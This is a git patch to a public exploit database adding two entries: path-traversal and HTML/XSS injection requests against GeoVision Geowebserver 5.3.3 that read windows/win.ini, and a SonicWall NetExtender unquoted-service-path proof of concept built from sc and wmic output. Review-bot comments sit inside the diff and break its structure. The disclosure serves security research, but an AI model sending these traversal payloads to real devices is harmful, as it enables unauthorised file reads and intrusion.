From 0105a5abef0774e7c18a1925e48885e3a5f65df9 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Wed, 18 Aug 2021 05:01:56 +0000
Subject: [PATCH] DB: 2021-08-18

2 changes to exploits/shellcodes

SonicWall NetExtender 10.2.0.300 - Unquoted Service Path
GeoVision Geowebserver 5.3.3 - LFI / XSS / HHI / RCE
---
 exploits/hardware/webapps/50211.txt | 37 +++++++++++++++++++
 exploits/windows/local/50212.txt | 56 +++++++++++++++++++++++++++++
 files_exploits.csv | 2 ++
 3 files changed, 95 insertions(+)
 create mode 100644 exploits/hardware/webapps/50211.txt
 create mode 100644 exploits/windows/local/50212.txt

diff --git a/exploits/hardware/webapps/50211.txt b/exploits/hardware/webapps/50211.txt
new file mode 100644
index 000000000..0d0b30922
--- /dev/null
+++ b/exploits/hardware/webapps/50211.txt
@@ -0,0 +1,37 @@
+# Exploit Title: GeoVision Geowebserver 5.3.3 - LFI / XSS / HHI / RCE
+# DynamicDNS Network to find: DIPMAP.COM / GVDIP.COM
+# Date: 6-16-21 (Vendor Notified)
+# Exploit Author: Ken 's1ngular1ty' Pyle
+# Vendor Homepage: https://www.geovision.com.tw/cyber_security.php
+# Version: <= 5.3.3
+# Tested on: Windows 20XX / MULTIPLE
+# CVE : https://www.geovision.com.tw/cyber_security.php
+
+GEOVISION GEOWEBSERVER =< 5.3.3 are vulnerable to several XSS / HTML Injection / Local File Include / XML Injection / Code execution vectors. The application fails to properly sanitize user requests. This allows injection of HTML code and XSS / client side exploitation, including session theft:
+
+Nested Exploitation of the LFI, XSS, HTML / Browser Injection:
+
+GET /Visitor/bin/WebStrings.srf?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini&obj_name= HTTP/1.1
+
+Absolute exploitation of the LFI:
+
+POST /Visitor/bin/WebStrings.srf?obj_name=win.ini
+
+GET /Visitor//%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fwindows\win.ini
+
+Additionally, the vendor has issued an ineffective / broken patch (https://www.geovision.com.tw/cyber_security.php) which does not appear to remediate or address the problem. Versions 5.3.3 and below continue to be affected. This is acknowledged by the vendor.
+
+
+ex. obj_name=INJECTEDHTML / XSS
+
+The application fails to properly enforce permissions and sanitize user request. This allows for LFI / Remote Code Execution through several vectors:
+
+ex. /Visitor//%252e(path to target)
+
+These vectors can be blended / nested to exfiltrate data in a nearly undetectable manner, through the API:
+
+The devices are vulnerable to HOST HEADER POISONING and CROSS-SITE REQUEST FORGERY against the web application. These can be used for various vectors of attack.
+
+These attacks were disclosed as part of the IOTVillage Presentation:
+
+ https://media.defcon.org/DEF%20CON%2029/DEF%20CON%2029%20villages/DEFCON%2029%20IoT%20Village%20-%20Ken%20Pyle%20-%20BLUEMONDAY%20Series%20Exploitation%20and%20Mapping%20of%20Vulnerable%20Devices%20at%20Scale.mp4
\ No newline at end of file
diff --git a/exploits/windows/local/50212.txt b/exploits/windows/local/50212.txt
new file mode 100644
index 000000000..cc840fe1b
--- /dev/null
+++ b/exploits/windows/local/50212.txt
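Review bot: The title (and the matching files_exploits.csv entry) claims RCE, but the body only demonstrates path traversal to windows/win.ini through the `file=` and `obj_name=` parameters of WebStrings.srf and HTML/XSS injection through `obj_name`; the code-execution claim is asserted without a supporting vector, so either add the evidence or narrow the title to `LFI / XSS / HHI` so defenders triage it at the right severity. The `# CVE :` header holds the vendor advisory URL rather than a CVE identifier; if none was assigned, `# CVE: N/A` is the usual form, and the URL is already given under `# Vendor Homepage`. `# Date: 6-16-21` is ambiguous between day-first and month-first order; `2021-06-16` would remove the doubt. The header says `Version: <= 5.3.3` while the body says `=< 5.3.3`; one spelling should be used throughout.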
@@ -0,0 +1,56 @@
+# Exploit Title: SonicWall NetExtender 10.2.0.300 - Unquoted Service Path
+# Exploit Author: shinnai
+# Software Link: https://www.sonicwall.com/products/remote-access/vpn-clients/
+# Version: 10.2.0.300
+# Tested On: Windows
+# CVE: CVE-2020-5147
+
+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
+Title: SonicWall NetExtender windows client unquoted service path
+vulnerability
+Vers.: 10.2.0.300
+Down.: https://www.sonicwall.com/products/remote-access/vpn-clients/
+
+Advisory:
+https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2020-0023
+CVE ID: CVE-2020-5147 (https://nvd.nist.gov/vuln/detail/CVE-2020-5147)
+
+URLs:
+https://besteffortteam.it/sonicwall-netextender-windows-client-unquoted-service-path-vulnerability/
+https://shinnai.altervista.org/exploits/SH-029-20210109.html
+
+Desc.:
+SonicWall NetExtender Windows client vulnerable to unquoted service path
+vulnerability, this allows a local attacker to gain elevated privileges
+in the host operating system.
+This vulnerability impact SonicWall NetExtender Windows client version
+10.2.300 and earlier.
+
+Poc:
+
+C:\>sc qc sonicwall_client_protection_svc
+[SC] QueryServiceConfig OPERAZIONI RIUSCITE
+NOME_SERVIZIO: sonicwall_client_protection_svc
+ TIPO : 10 WIN32_OWN_PROCESS
+ TIPO_AVVIO : 2 AUTO_START
+ CONTROLLO_ERRORE : 1 NORMAL
+ NOME_PERCORSO_BINARIO : C:\Program Files\SonicWall\Client
+Protection Service\SonicWallClientProtectionService.exe <-- Unquoted
+Service Path Vulnerability
+ GRUPPO_ORDINE_CARICAMENTO :
+ TAG : 0
+ NOME_VISUALIZZATO : SonicWall Client Protection Service
+ DIPENDENZE :
+ SERVICE_START_NAME : LocalSystem
+C:\>
+
+----------------------------------------------------------------------------------------------------------------------------------------------------------------------
+
+C:\>wmic service get name,displayname,pathname,startmode |findstr /i
+"auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
+SonicWall Client Protection Service
+sonicwall_client_protection_svc C:\Program Files\SonicWall\Client
+Protection Service\SonicWallClientProtectionService.exe Auto
+
+C:\>
+----------------------------------------------------------------------------------------------------------------------------------------------------------------------
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 55eb14612..95bb08dd5 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
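Review bot: The affected version is stated inconsistently: the header and the `Vers.:` line give `10.2.0.300`, but the description says `10.2.300 and earlier`; one of these is a typo and should match the other, since the version string is what defenders use to scope remediation. The description would also be more useful if it stated the fixed version, if the referenced SonicWall advisory SNWLID-2020-0023 names one, rather than only `and earlier`. The `sc qc` output is in Italian (`OPERAZIONI RIUSCITE`, `NOME_PERCORSO_BINARIO`), which is fine as evidence, but a short gloss such as `(Italian locale; NOME_PERCORSO_BINARIO = BINARY_PATH_NAME)` next to it would help readers confirm which field shows the unquoted path.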
@@ -11379,6 +11379,7 @@ id,file,description,date,author,type,platform,port
 50135,exploits/linux/local/50135.c,"Linux Kernel 2.6.19 < 5.9 - 'Netfilter Local Privilege Escalation",2021-07-15,TheFloW,local,linux,
 50184,exploits/windows/local/50184.txt,"Amica Prodigy 1.7 - Privilege Escalation",2021-08-10,"Andrea Intilangelo",local,windows,
 50188,exploits/android/local/50188.txt,"Xiaomi browser 10.2.4.g - Browser Search History Disclosure",2021-08-10,"Vishwaraj Bhattrai",local,android,
+50212,exploits/windows/local/50212.txt,"SonicWall NetExtender 10.2.0.300 - Unquoted Service Path",2021-08-17,shinnai,local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -44337,3 +44338,4 @@ id,file,description,date,author,type,platform,port
 50208,exploits/hardware/webapps/50208.txt,"COMMAX Smart Home Ruvie CCTV Bridge DVR Service - RTSP Credentials Disclosure",2021-08-16,LiquidWorm,webapps,hardware,
 50209,exploits/hardware/webapps/50209.txt,"COMMAX Smart Home Ruvie CCTV Bridge DVR Service - Config Write / DoS (Unauthenticated)",2021-08-16,LiquidWorm,webapps,hardware,
 50210,exploits/hardware/webapps/50210.txt,"COMMAX CVD-Axx DVR 5.1.4 - Weak Default Credentials Stream Disclosure",2021-08-16,LiquidWorm,webapps,hardware,
+50211,exploits/hardware/webapps/50211.txt,"GeoVision Geowebserver 5.3.3 - LFI / XSS / HHI / RCE",2021-08-17,"Ken Pyle",webapps,hardware,